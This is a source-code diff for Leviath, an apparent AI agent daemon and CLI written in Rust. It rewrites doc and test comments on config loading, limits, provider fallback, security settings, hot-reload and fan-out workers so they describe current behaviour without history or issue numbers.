@@ -2253,10 +2248,9 @@ brain = { kind = "custom", script = "hooks/brain.rhai", max_tokens = 1000 }
         .await;
     }
 
-    /// `lev validate` used to swallow a config that would not load: `.ok()`
-    /// made it `None`, the model and read-path checks silently stopped
-    /// running, and the command reported a clean blueprint the daemon would
-    /// then refuse to run the way it described.
+    /// `lev validate` says so when a config will not load. Swallowing it with
+    /// `.ok()` would silently stop the model and read-path checks and report a
+    /// clean blueprint the daemon would then refuse to run as described.
     #[test]
     fn a_config_that_does_not_load_is_said_out_loud_rather_than_swallowed() {
         let dir = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/config/fault.rs
+++ b/crates/leviath-cli/src/config/fault.rs
@@ -1,15 +1,14 @@
 //! Why `config.toml` would not load, in enough detail to point at the spot.
 //!
-//! Loading a config used to fail as an `anyhow::Error` carrying one flattened
-//! string. That is fine for a command about to exit and print it, and useless
-//! everywhere else: the daemon keeps running on its last good config, and the
-//! surfaces that then have to *explain* that - a JSON field, a dashboard
-//! banner two lines tall, a doctor check - each need the file, the one-line
-//! reason, and where in the file it is, separately.
+//! The loader produces a [`ConfigFault`]: the file, a one-line reason, and
+//! where in the file it is, each reachable on its own. A flattened string is
+//! enough for a command about to exit and print it, and not enough for
+//! anything else, because the daemon keeps running on its last good config and
+//! every surface that has to *explain* that - a JSON field, a dashboard banner
+//! two lines tall, a doctor check - lays those pieces out differently.
 //!
-//! So the loader produces a [`ConfigFault`] and the string is derived from it
-//! rather than the other way round. `Display` is still the sentence the CLI
-//! printed before, so nothing that only wanted the string had to change.
+//! `Display` renders the same sentence the CLI prints, so a caller that only
+//! wants the string can keep taking it.
 
 use std::fmt;
 use std::path::{Path, PathBuf};

--- a/crates/leviath-cli/src/config/limits.rs
+++ b/crates/leviath-cli/src/config/limits.rs
@@ -134,8 +134,8 @@ pub struct LimitsConfig {
     /// for a dead one and closes it, failing a request that was going fine.
     ///
     /// Set it to `false` if a provider's stream misbehaves; the buffered path
-    /// stays as it was. A provider that does not advertise streaming for the
-    /// model in hand is called the old way regardless.
+    /// is always there. A provider that does not advertise streaming for the
+    /// model in hand is called buffered regardless.
     ///
     /// Reloaded with `config.toml`: the next inference any run makes uses
     /// the new setting, and one already on the wire finishes the way it
@@ -175,8 +175,8 @@ pub struct LimitsConfig {
     /// This only ever fires for something the runtime cannot resolve on its own -
     /// today, a stage whose provider is not configured. Waiting for a busy
     /// model's inference pool is ordinary backpressure and is never failed, no
-    /// matter how long it takes. Defaults to `60`; `0` disables the watchdog and
-    /// restores the old behaviour of waiting indefinitely.
+    /// matter how long it takes. Defaults to `60`; `0` disables the watchdog, so
+    /// such a run waits indefinitely.
     ///
     /// Reloaded with `config.toml`, and read on every pass, so a change
     /// reaches the runs already going as well as the next one.
@@ -202,15 +202,14 @@ pub struct LimitsConfig {
     /// How long (seconds) a run keeps its place in `lev ps` after the daemon
     /// unloads it from memory.
     ///
-    /// A terminal run used to leave the listing the moment it was unloaded,
-    /// which made a run that died on its first inference look exactly like a run
-    /// that had never been spawned. A scheduler polling the listing could only
-    /// tell the two apart with a stopwatch, and issue #205 is what that cost:
-    /// forty minutes of spawning work, timing out, and spawning it again.
+    /// Without the window a terminal run leaves the listing the moment it is
+    /// unloaded, and a run that died on its first inference looks exactly like a
+    /// run that was never spawned. A scheduler polling the listing can only tell
+    /// the two apart with a stopwatch, so it spawns the work again, waits for it
+    /// to time out, and spawns it again.
     ///
-    /// Defaults to `300`. `0` drops a run as soon as it finishes, which is the
-    /// old behaviour. The record lives in memory, so a restart clears it
-    /// whatever this is set to.
+    /// Defaults to `300`. `0` drops a run as soon as it finishes. The record
+    /// lives in memory, so a restart clears it whatever this is set to.
     ///
     /// Reloaded with `config.toml`; read on every prune, so shortening the
     /// window drops the rows that have already outlived it.
@@ -220,12 +219,11 @@ pub struct LimitsConfig {
     /// leasing it before the daemon disconnects it (ending a stdio server's
     /// child process). Long enough that back-to-back runs of a blueprint reuse
     /// the warm connection; the next run that declares the server reconnects
-    /// lazily. `0` keeps every server connected for the daemon's life, which
-    /// was the old behaviour. A global `[[mcp_servers]]` entry is never
-    /// disconnected for idleness, because nothing leases one; take it out of
-    /// `config.toml` and this is how long it stays connected before
-    /// `daemon::mcp_reload` tears it down, so a stage part-way through a call
-    /// keeps the tool it was given.
+    /// lazily. `0` keeps every server connected for the daemon's life. A global
+    /// `[[mcp_servers]]` entry is never disconnected for idleness, because
+    /// nothing leases one; take it out of `config.toml` and this is how long it
+    /// stays connected before `daemon::mcp_reload` tears it down, so a stage
+    /// part-way through a call keeps the tool it was given.
     ///
     /// Read once at daemon start, so a change needs a daemon restart.
     #[serde(default = "default_mcp_idle_disconnect_secs")]
@@ -239,8 +237,7 @@ pub struct LimitsConfig {
     /// This only catches an agent holding *no* marker at all, which the engine's
     /// own invariants say cannot happen and which nothing will ever look at
     /// again. Such a run stays `running` in `meta.json` for the life of the
-    /// daemon and keeps whatever capacity an external scheduler assigned it,
-    /// which is issue #202.
+    /// daemon and keeps whatever capacity an external scheduler assigned it.
     ///
     /// Defaults to `0`, which is off: this fails runs, and an upgrade that
     /// starts killing work nobody asked it to kill is worse than the leak. `300`
@@ -289,8 +286,7 @@ pub struct LimitsConfig {
     /// needs you is still waiting when you get back, whether that is in ten
     /// minutes or on Monday. Nothing else in the daemon fails, reaps, or marks
     /// stuck a run that is waiting on a person; only cancelling it ends the
-    /// wait. Set this to bound the wait for a run nobody will be watching
-    /// (issue #204).
+    /// wait. Set this to bound the wait for a run nobody will be watching.
     ///
     /// Expiry resolves the prompt exactly as cancelling it would: a tool
     /// approval and a taint gate **deny**, an `ask_user_*` call is told nobody
@@ -320,8 +316,8 @@ pub struct LimitsConfig {
     /// Raising it lengthens how long a run rides out a provider **overload**
     /// (an Anthropic 529, or a 429), which is retried on its own much slower
     /// schedule of 15s, 30s, then 60s per further attempt - that case is why the
-    /// key exists (issue #417). Whatever this is set to, the retries of one
-    /// request may sleep at most five minutes in total.
+    /// key exists. Whatever this is set to, the retries of one request may sleep
+    /// at most five minutes in total.
     ///
     /// Reloaded with `config.toml`; read when a request is dispatched, so
     /// a change applies to the next attempt any run makes.
@@ -349,9 +345,8 @@ pub struct LimitsConfig {
     /// user who never opened this file - but a fresh install gets a concrete
     /// number written here, where it is visible and can be deleted outright.
     ///
-    /// The incident behind it (issue #252) was a single shell call appending in
-    /// a loop until the 60-second timeout: about 14 GB, from one call that
-    /// looked ordinary.
+    /// The shape it is here to stop: one shell call appending in a loop until
+    /// the 60-second timeout, about 14 GB from a call that looked ordinary.
     ///
     /// A shell redirect is measured *after* the call, since the bytes go from
     /// the shell to the file without passing through Leviath. So this stops the
@@ -410,7 +405,7 @@ pub struct LimitsConfig {
     ///
     /// This is the reporting half only. It does not stop a run - killing one
     /// mid-stage throws away work, which is a different decision from being told
-    /// what is happening (#573).
+    /// what is happening.
     ///
     /// A run whose models have no published price reports what it could price
     /// and says the figure is not exact, rather than reporting a confident zero.
@@ -640,11 +635,10 @@ mod restart_list_tests {
     /// Every `[limits]` field the daemon docs name as needing a restart, so the
     /// two halves of the same claim cannot drift apart.
     ///
-    /// The list in `daemon.md` had gone stale before, in both directions: it
-    /// named nine fields while ten more were boot-only and unmentioned, and it
-    /// went on naming fields after they were made to reload. Either shape is
-    /// the worst kind of list - complete enough to be trusted, wrong enough to
-    /// mislead. One field is left on it.
+    /// A hand-kept list drifts in both directions: it names fields that have
+    /// since learned to reload, and stays silent about ones that never did.
+    /// Either shape is the worst kind of list - complete enough to be trusted,
+    /// wrong enough to mislead. One field is on it.
     const RESTART_LIST: &[&str] = &["mcp_idle_disconnect_secs"];
 
     /// The restart section of the daemon docs page, read from the repo rather

--- a/crates/leviath-cli/src/config/mod.rs
+++ b/crates/leviath-cli/src/config/mod.rs
@@ -504,16 +504,16 @@ impl Config {
 
     /// Say so when the config file holds a key nothing reads.
     ///
-    /// Serde ignores unknown fields, so a misspelled or long-removed table sat
-    /// in `config.toml` doing nothing and saying nothing - `[cache] ttl` being
-    /// the reported case (#362). A warning rather than a hard error on
-    /// purpose: a blueprint is authored and validated deliberately, but this
-    /// file is long-lived and read by *every* command, so refusing to load it
-    /// over one stale key would take the whole CLI down rather than the one
-    /// thing that key was meant to affect.
+    /// Serde ignores unknown fields, so a misspelled or long-removed table
+    /// otherwise sits in `config.toml` doing nothing and saying nothing;
+    /// `[cache] ttl` is the shape people hit. A warning rather than a hard
+    /// error on purpose: a blueprint is authored and validated deliberately,
+    /// but this file is long-lived and read by *every* command, so refusing to
+    /// load it over one stale key would take the whole CLI down rather than the
+    /// one thing that key was meant to affect.
     ///
     /// Reported at every depth, so `[limits] max_concurrent_tool` is named as
-    /// readily as a whole unknown table (#365).
+    /// readily as a whole unknown table.
     fn warn_unknown_config_keys(content: &str) {
         let unknown = Self::unknown_config_keys(content);
         if !unknown.is_empty() {
@@ -943,7 +943,7 @@ impl Config {
 /// The canonical `LEVIATH_HOME`-aware resolvers live in
 /// [`leviath_core::paths`]; these re-exports keep this crate's established
 /// names pointing at that single definition instead of carrying a byte-for-
-/// byte copy of it (which is exactly how the override once diverged between
+/// byte copy of it (which is how an override drifts apart between
 /// components). `Config::config_path()` stays separate: it has its own
 /// narrower `LEVIATH_CONFIG_PATH` override above.
 pub use leviath_core::paths::home_dir as leviath_home_dir;
@@ -952,21 +952,20 @@ pub(crate) use leviath_core::paths::providers_dir;
 /// The update check is on when the key is absent.
 ///
 /// A named default rather than `#[serde(default)]`, which for a `bool` is
-/// `false` - so an existing config with no `update_check` line would have had
-/// the check switched off, which is the opposite of what leaving it out means.
+/// `false` - a config with no `update_check` line would then have the check
+/// switched off, the opposite of what leaving it out means.
 fn default_update_check() -> bool {
     true
 }
 
 /// The provider a config that names none is assumed to mean.
 ///
-/// Exists so `default_provider` can carry `#[serde(default)]`: without one,
-/// every field on [`Config`] that lacked a default made a hand-written
-/// `config.toml` a parse error. Writing three lines to point Leviath at
-/// OpenRouter used to fail with `missing field `providers``, which names a
-/// table the user has no reason to know about and says nothing about what to
-/// add. Kept in sync with [`Config::default`] by
-/// `an_empty_config_file_parses_to_the_defaults`.
+/// Exists so `default_provider` can carry `#[serde(default)]`: a field on
+/// [`Config`] with no default makes a hand-written `config.toml` a parse
+/// error. Three lines pointing Leviath at OpenRouter would fail with
+/// `missing field `providers``, which names a table the user has no reason to
+/// know about and says nothing about what to add. Kept in sync with
+/// [`Config::default`] by `an_empty_config_file_parses_to_the_defaults`.
 pub(crate) fn default_provider_name() -> String {
     "anthropic".to_string()
 }
@@ -1390,10 +1389,9 @@ mod tests {
 
     /// An unknown key is reported wherever it sits, not only at the top level.
     ///
-    /// The reported case (#365) was `[limits] max_concurrent_tool`, a
-    /// misspelling one level down, which the first version of this check could
-    /// not see: it compared top-level keys only, so a whole bogus table was
-    /// named and a bogus key inside a real table was not.
+    /// `[limits] max_concurrent_tool` is the shape: a misspelling one level
+    /// down. A check that compared top-level keys only would name a whole bogus
+    /// table and miss a bogus key inside a real one.
     #[test]
     fn an_unknown_key_is_reported_at_any_depth() {
         let content = "\
@@ -2167,7 +2165,7 @@ some_custom_thing = \"forwarded to the script\"
 
     /// The `[limits]` tables reach the engine's pools: the global fallback for
     /// an unlisted model, a per-model override, and a per-provider cap that is
-    /// deliberately *not* filled in from the global number (issue #522).
+    /// deliberately *not* filled in from the global number.
     #[test]
     fn inference_pools_carries_every_limits_table_through() {
         let mut limits = LimitsConfig {
@@ -2197,8 +2195,8 @@ some_custom_thing = \"forwarded to the script\"
     }
 
     /// A config that never mentions the field waits for a person; an explicit
-    /// `0` (how "wait for ever" used to be spelled) parses as `Some(0)`, which
-    /// the hub reads the same way; a number is a deadline.
+    /// `0` parses as `Some(0)`, which the hub reads the same way; a number is a
+    /// deadline.
     #[test]
     fn interaction_timeout_defaults_and_parses() {
         let dir = tempfile::tempdir().unwrap();
@@ -2233,7 +2231,7 @@ some_custom_thing = \"forwarded to the script\"
     }
 
     /// The retry schedule is the shipped one unless someone says otherwise, so
-    /// an existing install's behaviour does not change under it (issue #417).
+    /// an install that mentions none of these keys keeps the behaviour it has.
     #[test]
     fn the_inference_retry_schedule_defaults_and_parses() {
         let dir = tempfile::tempdir().unwrap();
@@ -3065,10 +3063,10 @@ script = \"groq.rhai\"
     }
 
     /// An endpoint has no script to forward `extra` to, so a key it does not
-    /// read is a misspelling that used to load clean and do nothing: `modles`
-    /// left the endpoint with no catalogue, `heaeders` sent no headers, and
-    /// `unknown_config_keys` could not see either because `flatten` writes
-    /// them back. The load now refuses, naming the entry, the keys, and the
+    /// read is a misspelling that would otherwise load clean and do nothing:
+    /// `modles` leaves the endpoint with no catalogue, `heaeders` sends no
+    /// headers, and `unknown_config_keys` sees neither, because `flatten`
+    /// writes them back. The load refuses, naming the entry, the keys, and the
     /// ones it does read.
     #[test]
     fn an_endpoint_entry_with_unknown_keys_fails_the_load() {
@@ -3368,8 +3366,8 @@ agent_paths = []
     #[test]
     fn the_three_lines_that_point_leviath_at_openrouter_are_enough() {
         // What a user writes by hand after reading the OpenRouter docs. Every
-        // field on Config used to be required, so this failed with `missing
-        // field `providers`` - a table they have no reason to know about, in a
+        // field on Config needs a default, or this fails with `missing field
+        // `providers`` - a table they have no reason to know about, in a
         // message that says nothing about what to add.
         let config: Config = toml::from_str(
             r#"
@@ -3480,9 +3478,9 @@ url = "https://mcp.example.com/mcp"
     #[test]
     fn config_from_toml_with_model_capabilities() {
         // A one-field entry, which is what someone correcting a wrong context
-        // window actually writes. It used to fail to deserialize and be dropped
-        // in silence (#338); now it parses and names only that field, so
-        // everything it did not mention comes from the provider.
+        // window actually writes. It parses and names only that field, so
+        // everything it did not mention comes from the provider; requiring the
+        // whole entry drops it in silence.
         let toml = r#"
 [model_capabilities."my-custom-model"]
 max_context_tokens = 1048576

--- a/crates/leviath-cli/src/config/providers.rs
+++ b/crates/leviath-cli/src/config/providers.rs
@@ -90,7 +90,8 @@ pub struct ProviderConfig {
     /// `provider/model` rather than a bare provider name because a failover
     /// target needs a model to send; there is no sensible default per provider.
     /// A blueprint that names one model has nowhere to go without this, which
-    /// is exactly how issue #201 took every agent down at once.
+    /// is how one provider running out of credits takes every agent down at
+    /// once.
     #[serde(default)]
     pub fallback_order: Vec<String>,
 }
@@ -203,15 +204,15 @@ pub struct ModelProviderConfig {
     /// Only needed by a script with no `list_models`: one that has it is asked
     /// directly, and its answer is preferred over this list. Without either,
     /// the provider claims no models and can only be reached by a blueprint
-    /// that pins it, which is what made a local model unreachable however the
-    /// machine set `default_provider` (issue #598).
+    /// that pins it, which leaves a local model unreachable however the machine
+    /// sets `default_provider`.
     /// `None` when the file does not mention it, `Some` when it does - including
     /// `Some(vec![])` for an explicit `serves = []`.
     ///
-    /// The two are different states and were conflated as one empty `Vec`, which
-    /// is what made the stale `serves = []` unremovable: a save-back writes
-    /// whatever the field holds, and an empty `Vec` writes as `serves = []`
-    /// however it got there. `None` writes nothing, which is what lets the
+    /// The two are different states, and collapsing them into one empty `Vec`
+    /// makes a stale `serves = []` unremovable: a save-back writes whatever the
+    /// field holds, and an empty `Vec` writes as `serves = []` however it got
+    /// there. `None` writes nothing, which is what lets the
     /// `stale-empty-serves` migration take the line out.
     ///
     /// Skipping `None` does not break the invariant `Config::unknown_config_keys`
@@ -289,8 +290,9 @@ impl ModelProviderConfig {
         // `extra` exists to reach a script's `initialize`. An endpoint has no
         // script, so a key landing there is one the endpoint will never read:
         // `modles` leaves it with no catalogue and `heaeders` sends nothing,
-        // and both used to load clean. `Config::unknown_config_keys` cannot
-        // catch them either, because `flatten` writes them straight back.
+        // and both would otherwise load clean. `Config::unknown_config_keys`
+        // cannot catch them either, because `flatten` writes them straight
+        // back.
         if self.is_endpoint() && !self.extra.is_empty() {
             let mut keys: Vec<&str> = self.extra.keys().map(String::as_str).collect();
             keys.sort_unstable();

--- a/crates/leviath-cli/src/config/security.rs
+++ b/crates/leviath-cli/src/config/security.rs
@@ -31,9 +31,9 @@ pub struct SecurityConfig {
     /// it.
     ///
     /// This exists because the workdir defaults to wherever `lev run` was
-    /// invoked, and running from `~` is an easy thing to do by accident - issue
-    /// #252 is a machine that lost 115 GB to an agent writing under a profile
-    /// root. Confirming is cheap; noticing afterwards is not.
+    /// invoked, and running from `~` is an easy thing to do by accident. An
+    /// agent turned loose under a profile root can eat tens of gigabytes.
+    /// Confirming is cheap; noticing afterwards is not.
     #[serde(default)]
     pub allowed_workdirs: Vec<String>,
 
@@ -101,7 +101,7 @@ pub struct SecurityConfig {
     /// `SSH_AUTH_SOCK`, so `git push` over agent keys still works. `strict`
     /// drops the carve-out and also takes `AWS_PROFILE`, `KUBECONFIG` and
     /// friends. `custom` ignores the shape heuristic and withholds exactly what
-    /// [`Self::shell_env_withhold`] names. `inherit` is the old behaviour.
+    /// [`Self::shell_env_withhold`] names. `inherit` withholds nothing.
     ///
     /// Toolchain variables - `PATH`, `HOME`, `CARGO_HOME`, `JAVA_HOME`,
     /// `VIRTUAL_ENV`, `NVM_DIR`, `GOPATH`, `DOCKER_HOST` - pass through under

--- a/crates/leviath-cli/src/daemon/client.rs
+++ b/crates/leviath-cli/src/daemon/client.rs
@@ -28,27 +28,26 @@ pub(crate) struct AgentSource {
 
 /// Find the agent's manifest and parse it, once.
 ///
-/// The parse is unconditional. It used to happen only when there were region
-/// flags to validate, but the blueprint's name and description are now needed
-/// for the editor template too, and parsing here is strictly better regardless:
-/// it is the same parser the daemon runs on the same file moments later, so a
-/// manifest that fails here would have failed there, and `parse manifest: <toml
-/// error>` before the daemon is contacted beats a spawn rejection after.
+/// The parse is unconditional rather than gated on there being region flags to
+/// validate: the blueprint's name and description are needed for the editor
+/// template too, and it costs nothing either way. This is the same parser the
+/// daemon runs on the same file moments later, so a manifest that fails here
+/// would have failed there, and `parse manifest: <toml error>` before the
+/// daemon is contacted beats a spawn rejection after.
 pub(crate) fn load_agent_source(path: &str) -> anyhow::Result<AgentSource> {
     let found = find_manifest(path)?;
     // Absolute, because this path is about to be handed to the daemon, which
     // has its own working directory. `lev run .` and `lev run ./demo` resolve
     // fine here and then arrive there as `./agent.leviath`, which the daemon
     // reads relative to wherever it happens to have been started - so the spawn
-    // failed with "read manifest './agent.leviath': No such file or directory".
-    // `lev create` prints `lev run .` as its next step, so this was the first
-    // thing a new user hit.
+    // fails with "read manifest './agent.leviath': No such file or directory".
+    // `lev create` prints `lev run .` as its next step, so that is the first
+    // thing a new user hits.
     //
     // Best-effort rather than fallible: `find_manifest` only returns paths it
     // has already confirmed resolve, so a failure here needs the file to vanish
-    // between the two calls. Falling back to what it found leaves the old
-    // behavior, which is a legible daemon-side error, rather than inventing an
-    // error arm no test can reach.
+    // between the two calls. Falling back to what it found leaves a legible
+    // daemon-side error rather than inventing an error arm no test can reach.
     let manifest = std::fs::canonicalize(&found).unwrap_or(found);
     let run_stem = manifest
         .parent()
@@ -528,9 +527,9 @@ mod tests {
     }
 
     /// The daemon has its own working directory, so a relative `PATH` has to be
-    /// resolved before the request leaves. `lev run .` used to reach the daemon
-    /// as `./agent.leviath` and fail there, which is the very command
-    /// `lev create` prints as the next step.
+    /// resolved before the request leaves: `lev run .` reaching the daemon as
+    /// `./agent.leviath` fails there, and it is the very command `lev create`
+    /// prints as the next step.
     #[test]
     fn resolve_spawn_args_sends_an_absolute_blueprint_path_for_a_relative_input() {
         // Reading the CWD is enough to race the tests that *move* it: one of

--- a/crates/leviath-cli/src/daemon/config_reload.rs
+++ b/crates/leviath-cli/src/daemon/config_reload.rs
@@ -1,21 +1,15 @@
 //! Hot-reloading of the daemon's spawn-time config.
 //!
-//! The daemon loads `~/.leviath/config.toml` once at startup and would
-//! otherwise serve that snapshot for its whole life - so a user who granted a
-//! `[read_paths]` path, flipped a tool permission, or changed a limit had to
-//! restart the daemon before the next `lev run` saw it. That is a surprising
-//! loop to be stuck in: the spawn warning tells you to edit the config, and
-//! editing it appears to do nothing.
-//!
-//! [`ConfigReloader`] closes that gap for the config an agent reads *at spawn*
-//! (permissions, `[read_paths]`, sandbox defaults, limits, taint). It reloads
-//! the file when its mtime changes, mirroring the script-provider hot-reload
-//! (`leviath_runtime::script_provider`), and keeps the last good config if a
-//! reload fails so an edit saved mid-keystroke never breaks a spawn.
+//! [`ConfigReloader`] owns the config an agent reads *at spawn* (permissions,
+//! `[read_paths]`, sandbox defaults, limits, taint), so a `config.toml` edit is
+//! in force on the next `lev run` rather than the next daemon restart. It
+//! reloads the file when its mtime changes, mirroring the script-provider
+//! hot-reload (`leviath_runtime::script_provider`), and keeps the last good
+//! config if a reload fails so an edit saved mid-keystroke never breaks a
+//! spawn.
 //!
 //! Provider credentials are rebuilt from the same reloaded config by the
-//! `provider_reload` module beside this one, so a key added or removed here
-//! reaches the next run too, and `[observability]` is rebuilt by the
+//! `provider_reload` module beside this one, and `[observability]` by the
 //! `telemetry_reload` module next to that. Settings that live somewhere other
 //! than the spawn-time config follow it through
 //! [`ConfigReloader::with_reload_hook`]: a caller registers what to re-apply,
@@ -23,11 +17,13 @@
 //! process-wide network policy, which is mirrored into atomics the shared
 //! blocking HTTP client reads (`script_host::mirror_process_policy`).
 //!
-//! The global `[[mcp_servers]]` are reconciled against the reloaded config by
-//! the `mcp_reload` module beside this one, so a server added, edited or
-//! removed here reaches the next run too. What still comes from the config the
-//! daemon booted with is `[limits] mcp_idle_disconnect_secs`, which the MCP
-//! pool is built with; see `daemon.md`.
+//! The global `[[mcp_servers]]` are not reloaded here, because bringing a
+//! server up or down is async and this reload is read from the sync spawner.
+//! The `mcp_reload` module beside this one reconciles them from the spawn
+//! preprocessor, the one hook on the spawn path that can await, so a server
+//! added, edited or removed reaches the next run too. What still comes from the
+//! config the daemon booted with is `[limits] mcp_idle_disconnect_secs`, which
+//! the MCP pool is built with; see `daemon.md`.
 
 use std::path::PathBuf;
 use std::sync::{Arc, Mutex, PoisonError};
@@ -43,8 +39,7 @@ struct Cached {
     ///
     /// Advanced on a failed load as well as a successful one, which is what
     /// makes a broken file cost one stat per spawn instead of a stat, a read,
-    /// a parse and a log line. The comment here used to claim that already;
-    /// the code only did it in the `Ok` arm.
+    /// a parse and a log line.
     mtime: Option<SystemTime>,
     /// The mtime of the config actually in force. Differs from
     /// [`mtime`](Self::mtime) exactly while the file on disk is broken, and is
@@ -60,11 +55,10 @@ struct Cached {
 
 /// Whether `config.toml` loads, and what is running while it does not.
 ///
-/// The reloader has always kept the last good config when a save did not
-/// parse. What it did not do was tell anyone: the single `tracing::warn!` went
-/// to the daemon log, so a user with a typo watched their edits do nothing and
-/// had no way to find out why. This is that fact, in a shape the API, the
-/// dashboard and the CLI can each render.
+/// A save that does not parse keeps the last good config in force, and that is
+/// invisible from outside: the `tracing::warn!` goes to the daemon log, so a
+/// user with a typo just watches their edits do nothing. This is that fact in a
+/// shape the API, the dashboard and the CLI can each render.
 #[derive(Debug, Clone)]
 pub(crate) struct ConfigHealth {
     /// The file being watched.
@@ -247,11 +241,9 @@ impl ConfigReloader {
                 // Keep the config already in force; only the "mtime last
                 // looked at", recorded above whichever way this went, moves.
                 // That is what makes the warning fire once per broken save
-                // rather than once per spawn: without it the file would be
-                // re-stat'd, re-read, re-parsed and re-warned on every spawn
-                // and every `lev serve` request until somebody fixed it, which
-                // is a log line per page load. The *next* save moves the mtime
-                // again, so a fixed file still reloads.
+                // rather than once per spawn and once per `lev serve` request.
+                // The *next* save moves the mtime again, so a fixed file still
+                // reloads.
                 let summary = fault.summary();
                 let kind = fault.kind.as_str();
                 if cached.fault.is_none() {
@@ -498,10 +490,9 @@ mod tests {
         assert_eq!(recorded(), vec![true], "a broken save applies nothing");
     }
 
-    /// A file left broken is read once, not on every spawn. It used to keep
-    /// the stale mtime, so every later `current()` re-stat'd it, re-read it,
-    /// re-parsed it and warned again - which for `lev serve` is a log line per
-    /// page load, and is the opposite of what the code's own comment claimed.
+    /// A file left broken is read once, not on every spawn: the watched mtime
+    /// advances even though the load failed. Keeping the stale mtime instead
+    /// would cost `lev serve` a read, a parse and a warning per page load.
     #[test]
     fn a_file_left_broken_is_not_re_read_on_every_call() {
         let dir = tempfile::tempdir().unwrap();
@@ -519,11 +510,9 @@ mod tests {
             "the broken save keeps the config already in force"
         );
 
-        // What actually stops the re-read: the mtime the reloader is now
-        // comparing against is the broken file's, so the next `current()`
-        // short-circuits on the mtime check instead of reading and parsing
-        // again. Keeping the good file's mtime here is what made every later
-        // call re-read and re-warn.
+        // What stops the re-read: the mtime the reloader is now comparing
+        // against is the broken file's, so the next `current()` short-circuits
+        // on the mtime check instead of reading and parsing again.
         assert_eq!(
             reloader
                 .cache
@@ -640,9 +629,7 @@ mod tests {
     /// Probed by rewriting the file to something valid while pinning its mtime
     /// back to the failing save's: a reloader that re-reads on every call
     /// would see the good content and go healthy, and one that remembers the
-    /// mtime it already judged cannot. Before this change the failing mtime
-    /// was never recorded, so every `current()` re-read, re-parsed and
-    /// re-warned - which is what the log spam was.
+    /// mtime it already judged cannot.
     #[test]
     fn a_broken_file_is_read_once_per_failing_mtime() {
         let dir = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/daemon/fanout_spawner.rs
+++ b/crates/leviath-cli/src/daemon/fanout_spawner.rs
@@ -104,10 +104,10 @@ impl FanOutSpawner for DaemonFanOutSpawner {
         // parent for a2ui wants its workers' contributions in the same shape,
         // and the worker's answer is what the merge stage reads.
         // So does the run's `--model` override, which the docs call absolute
-        // ("overrides everything"). It used to stop at the run boundary, so a
-        // fan-out of thirty workers sent the large majority of a run's spend to
-        // whatever the worker blueprint listed - silently, and against an
-        // instruction the operator had typed for this run (issue #534).
+        // ("overrides everything"). Stopping it at the run boundary would send
+        // the large majority of a thirty-worker fan-out's spend to whatever the
+        // worker blueprint lists, silently, against an instruction the operator
+        // typed for this run.
         let (parent_path, workdir, parent_run_id, unattended, output_request, model_override) =
             world
                 .get::<RunMetadata>(parent)
@@ -149,7 +149,7 @@ impl FanOutSpawner for DaemonFanOutSpawner {
         // Nest the worker under its fan-out parent in the run tree.
         args.parent_run_id = Some(parent_run_id);
 
-        // Per-agent MCP (issue #97): advertise the worker blueprint's servers that
+        // Per-agent MCP: advertise the worker blueprint's servers that
         // are already connected in the shared pool (a `worker_stage` worker shares
         // the parent's - already warmed by the parent's preprocessor; the first
         // `worker_agent`/`worker_query` worker warms them here for its siblings).
@@ -550,9 +550,9 @@ mod tests {
         );
     }
 
-    /// A worker of an unattended parent is unattended. Spawning workers attended
-    /// under a `--yolo` parent left them stopping on approval prompts nobody was
-    /// watching for, with the parent parked behind them (issue #184).
+    /// A worker of an unattended parent is unattended. An attended worker under
+    /// a `--yolo` parent stops on an approval prompt nobody is watching for,
+    /// and parks the parent behind it.
     #[tokio::test]
     async fn spawn_worker_inherits_the_parents_unattended_setting() {
         for unattended in [false, true] {
@@ -583,10 +583,10 @@ mod tests {
         }
     }
 
-    /// A run-level `--model` covers the whole run, workers included. It used to
-    /// stop at the run boundary, so a fan-out of thirty workers sent the large
-    /// majority of a run's spend to whatever the worker blueprint listed -
-    /// silently, and against an instruction typed for this run (issue #534).
+    /// A run-level `--model` covers the whole run, workers included: stopping
+    /// at the run boundary would send most of a thirty-worker fan-out's spend
+    /// to whatever the worker blueprint lists, against an instruction typed for
+    /// this run.
     ///
     /// Asserts the worker's *resolved stage model*, not just the field: what
     /// matters is which model the worker actually calls.

--- a/crates/leviath-cli/src/daemon/lifecycle.rs
+++ b/crates/leviath-cli/src/daemon/lifecycle.rs
@@ -76,8 +76,6 @@ pub fn stop_fallback(recorded_pid: Option<u32>) -> StopFallback {
     }
 }
 
-/// The line `lev daemon stop` prints, or the error it fails with.
-///
 /// What `lev daemon stop` prints when the daemon ignores it for the whole of
 /// [`super::readiness::READY_TIMEOUT`].
 ///

--- a/crates/leviath-cli/src/daemon/lifecycle/tests.rs
+++ b/crates/leviath-cli/src/daemon/lifecycle/tests.rs
@@ -74,7 +74,8 @@ fn not_running_is_a_success_and_not_stopping_is_not() {
     assert!(stop_outcome(true, false).is_err());
 }
 
-/// The message used to say "5s" on every platform while Windows waits 15s.
+/// The stop message quotes the platform's real wait, which is not 5s
+/// everywhere: Windows waits 15s.
 #[test]
 fn the_shutdown_message_names_the_real_timeout() {
     let secs = super::super::readiness::READY_TIMEOUT.as_secs();

--- a/crates/leviath-cli/src/daemon/live_limits.rs
+++ b/crates/leviath-cli/src/daemon/live_limits.rs
@@ -3,18 +3,16 @@
 //! The settings in this module are the ones the world is *built* with: pool
 //! sizes, lane widths, watchdog timeouts, the circuit breaker, the retry
 //! schedule, the fan-out ceiling, the listing window, the spend figures and
-//! whether runs get titles. Every one of them was read once in
-//! [`build_host`](crate::daemon::setup::build_host) and then fixed for the life
-//! of the process, so editing any of them and starting a run did nothing at
-//! all, with nothing to say so.
+//! whether runs get titles. All of them are re-applied from here whenever the
+//! daemon has a freshly reloaded config, so editing one and starting a run
+//! works without a daemon restart.
 //!
-//! One of those was worse than doing nothing. Spawn already reads a fresh
-//! config, so turning `[title]` on made spawn mark the new run `PendingTitle` -
-//! and the dispatch system, reading the boot-time `TitleSettings`, saw titling
-//! switched off and quietly dropped the marker. The run was marked for a title
-//! that could never be made. Applying the same config to the world before the
-//! spawner reads it is what closes that: both halves now answer from one
-//! document.
+//! `[title]` is the one that has to be applied *before* the spawner reads the
+//! config, not merely at some point. Spawn reads a fresh config and marks the
+//! new run `PendingTitle`; a dispatch system still on a boot-time
+//! `TitleSettings` would see titling switched off and drop the marker without a
+//! word, leaving the run marked for a title nobody will ever make. Applying
+//! here is what makes both halves answer from one document.
 //!
 //! The comparison is on the settings themselves rather than the file's mtime,
 //! so a save that only changed a tool permission does not touch the pools. Each
